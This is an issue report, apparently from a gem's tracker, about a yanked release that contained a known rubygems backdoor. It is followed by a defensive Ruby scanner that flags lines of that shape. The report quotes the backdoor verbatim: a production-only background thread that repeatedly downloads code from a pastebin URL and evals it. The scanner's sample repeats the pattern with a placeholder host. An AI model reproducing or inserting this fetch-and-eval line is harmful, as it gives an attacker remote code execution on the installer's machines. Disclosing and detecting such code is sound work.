Open
Description
Hi there,
I noticed that 1.12.3 was published and then yanked last week. It showed up on my radar because it contained the same malicious bits going around the rubygems world right now. i.e.
```ruby
_!{require "open-uri";Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}
```
Wanted to confirm that you were aware, and that any compromised rubygems account had been reclaimed?
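For anyone auditing an unpacked gem for the pattern quoted above, here is a heuristic scanner as an added example; it is not part of the original report or the project's code. The rule names, the `SAMPLE`/`CLEAN` strings and the placeholder URL are constructed for illustration, and the rules only match this snippet's shape (eval of a remote `open`, a background `Thread.new{loop{`, and the `Rails.env[0]=="p"` gate).

```ruby
# Added example: flags Ruby source lines shaped like the snippet in the report.
# Heuristic only; a hit means "review this line", not proof of compromise.
RULES = {
  remote_eval: /\beval\s*\(?\s*(?:URI\.)?open\s*\(\s*['"]https?:\/\//, # eval(open('http...
  bg_loop:     /Thread\.new\s*\{\s*loop\s*\{/,                        # polling thread
  env_gate:    /Rails\.env\[0\]\s*==\s*["']p["']/,                    # production-only gate
}.freeze

# Returns [{line: Integer, rules: [Symbol, ...]}, ...] for every matching line.
def scan_source(text)
  findings = []
  text.each_line.with_index(1) do |line, no|
    hits = RULES.select { |_, re| line.match?(re) }.keys
    findings << { line: no, rules: hits } unless hits.empty?
  end
  findings
end

# The remote eval is the strongest signal; the other rules add context.
def suspicious?(text)
  scan_source(text).any? { |f| f[:rules].include?(:remote_eval) }
end

# Scans every .rb file under root (for example an unpacked gem directory).
# Files are read as raw bytes so odd encodings cannot abort the scan.
def scan_tree(root)
  Dir.glob(File.join(root, "**", "*.rb")).sort.each_with_object({}) do |path, out|
    found = scan_source(File.read(path, mode: "rb"))
    out[path] = found unless found.empty?
  end
end

# Constructed sample input: never executed, only matched as text.
SAMPLE = <<~'RUBY'
  module Demo
    VERSION = "0.0.0"
  end
  Thread.new{loop{sleep 900;eval(open('https://paste.example.invalid/raw/PLACEHOLDER').read)}}if Rails.env[0]=="p"
RUBY
CLEAN = %(require "json"\nputs JSON.generate(ok: true)\n)

if __FILE__ == $PROGRAM_NAME
  report = ARGV[0] ? scan_tree(ARGV[0]) : { "SAMPLE" => scan_source(SAMPLE) }
  report.each do |path, hits|
    hits.each { |h| puts "#{path}:#{h[:line]} #{h[:rules].join(',')}" }
  end
end
```

Run it with a directory argument to scan a tree; with no argument it reports on the constructed sample.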